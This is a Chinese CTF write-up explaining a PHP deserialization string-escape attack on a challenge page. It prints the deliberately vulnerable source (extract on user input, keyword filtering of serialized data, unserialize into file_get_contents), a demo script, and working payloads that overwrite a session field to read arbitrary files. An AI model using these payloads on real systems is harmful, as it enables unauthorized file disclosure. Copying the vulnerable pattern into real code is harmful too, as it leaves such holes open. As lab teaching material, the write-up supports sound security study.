| 审计源码  <?php
$function = @$_GET['f'];
//正则匹配
function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}
if($_SESSION){
    unset($_SESSION);
}
$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;
//提取POST参数
extract($_POST);
if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}
//img_path参数
if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}
$serialize_info = filter(serialize($_SESSION));
if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
} 
 关键的有两句,具体怎么用后面再说: extract($_POST);
$serialize_info = filter(serialize($_SESSION));
 然后可以观察到的是除了源码还提供了两个功能:phpinfo,show_image,phpinfo回显phpinfo()没啥好说的show_image读取文件内容,这就是我们的注入点,那么flag在哪呢,phpinfo当然不会白给
 注意到里面有一个d0g3_f1ag.php,这应该就是第一个提示,没啥好说的,img要被赋成这个值
 由于sha1不可逆,所以不指望用原来的img能被赋成这个值了
 好在还存在一个序列化操作,于是想到了对象逃逸,之前也遇到过,
 就是你自定义了一个同名属性,然后把原来应有的属性给覆盖了,一般来说这跟后端的过滤机制有关
 这里正则匹配就发生了作用,我们可以在传参时故意加一些flag之类的参数,然后序列化后字符串长度不变
 所以会造成字符串逃逸
 借用一下大佬的例子,来讲一下
 
<?php
//error_reporting(0);
$str["a123"]="flagflagflagflag";
$str["a"]="\";s:1:\"c\";s:2:\"12\";s:1:\"t\";s:3:\"125\";}as";
$str["b"]="456";
$s=serialize($str);
print($s); //a:3:{s:4:"a123";s:16:"flagflagflagflag";s:1:"a";s:40:"";s:1:"c";s:2:"12";s:1:"t";s:3:"125";}as";s:1:"b";s:3:"456";}
echo "\n";
$s1=preg_replace("/flag/","",$s); //a:3:{s:4:"a123";s:16:"";s:1:"a";s:40:"";s:1:"c";s:2:"12";s:1:"t";s:3:"125";}as";s:1:"b";s:3:"456";}
print($s1);
$s2=unserialize($s1);
var_dump($s2);
?>
 运行结果: a:3:{s:4:"a123";s:16:"flagflagflagflag";s:1:"a";s:40:"";s:1:"c";s:2:"12";s:1:"t";s:3:"125";}as";s:1:"b";s:3:"456";}
a:3:{s:4:"a123";s:16:"";s:1:"a";s:40:"";s:1:"c";s:2:"12";s:1:"t";s:3:"125";}as";s:1:"b";s:3:"456";}array(3) {
  ["a123"]=>
  string(16) "";s:1:"a";s:40:""
  ["c"]=>
  string(2) "12"
  ["t"]=>
  string(3) "125"
}
 运行之后可以明显发现由于flag被过滤了,所以造成原先的a属性被吞掉了,而带入了我们自定义的c和t那么就是这么个原理,上payload:
 _SESSION['flagflag']=";s:3:"aaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}//d0g3_f1ag.php的base64编码
 第一步extract的时候读出来的是 $_SESSION['flagflag']=";s:3:"aaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
 序列化session后: a:2:{s:8:"flagflag";s:51:"";s:3:"aaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
 过filter: a:2:{s:8:"";s:51:"";s:3:"aaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}";s:3:"img";s:20:"Z3Vlc3RfaW1nLnBuZw==";}
 反序列化后由于我们没给img_path,所以读的是我们给的img属性,就是d0g3_f1ag.php反序列化的结果
 ,Array
(
    [";s:51:"] => aaa
    [img] => ZDBnM19mMWFnLnBocA==
)
 很明显,读取的image文件是由我们定的,回显$flag = ‘flag in /d0g3_fllllllag’;然后就是同样的操作,读取/d0g3_fllllllag,base64编码后是L2QwZzNfZmxsbGxsbGFn
 于是得到payload:
 _SESSION[flagflag]=";s:3:"aaa";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}
 如果有wamp本地环境,把index.php小改可能会有助理解 <?php
$function = @$_GET['f'];
//正则匹配
function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}
if($_SESSION){
    unset($_SESSION);
}
$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;
//提取get参数
extract($_GET);
if(!$function){
    echo '<a href="test.php?f=highlight_file">source_code</a>';
}
//img_path参数
if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}
$serialize_info = filter(serialize($_SESSION));
print_r($_SESSION);
echo "\n";
echo serialize($_SESSION);
echo "\n";
echo $serialize_info;
echo "\n";
if($function == 'highlight_file'){
    highlight_file('test.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    print_r($userinfo);
   // echo file_get_contents(base64_decode($userinfo['img']));
}
?>
 payload为:127.0.0.1/test.php?f=show_image&_SESSION[flagflag]=";s:3:"aaa";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}参考视频链接:https://www.bilibili.com/video/BV1sZ4y1971T/
 |